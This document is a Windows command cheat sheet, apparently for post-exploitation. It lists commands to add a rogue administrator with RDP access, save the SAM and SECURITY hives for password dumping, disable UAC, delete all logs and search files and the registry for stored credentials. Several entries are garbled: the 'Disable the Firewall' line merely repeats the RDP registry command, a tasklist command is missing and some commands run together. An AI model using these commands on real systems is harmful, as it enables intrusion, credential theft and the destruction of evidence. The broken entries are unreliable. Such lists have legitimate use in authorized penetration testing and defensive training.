Add Admin User w/ RDP

net user <username> <password> /ADD
net localgroup administrators <username> /ADD
net localgroup "Remote Desktop Users" username /ADD

Remove User

net user badaccount /del

Tasks / Services

Start or stop a service

net start|stop servicename

View the currently running tasklist


Kill a task by name

task kill /F /IM task.exe

Kill a task by PID

taskkill /PID PID /F

Base64 encoding / decoding

base64 encodecertutil -encode inputfile outputfile
base64 decode
cmd certutil -decode inputfile outputfile

Dump passwords via reg.exe

reg.exe save hklm\sam c:\sam_backup reg.exe save hklm\security c:\security_backup reg.exe save hklm\system c:\system

Security settings

    Allow RDPreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Disable UACreg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system reg setval -v EnableLUA -d 0 -t REG_DWORD -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system
    Refresh policiesgpupdate /force
    Disable the Firewallreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Services status

sc queryex type= service state= all
netstat -ano

Start & stop a service:

sc start <SERVICE NAME>
sc stop <SERVICE NAME>

Reading values from registry

C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Interesting files

%WINDIR%\repair\software, %WINDIR%\repair\security

List logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords


netsh wlan show profile

Interesting Registries


reg query "HKCU\Software\ORL\WinVNC3\Password" [VNC]

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" [Windows]

SNMP Paramters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" [SNMP PARAMS]


reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" [Putty Plaintext Credentials]

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s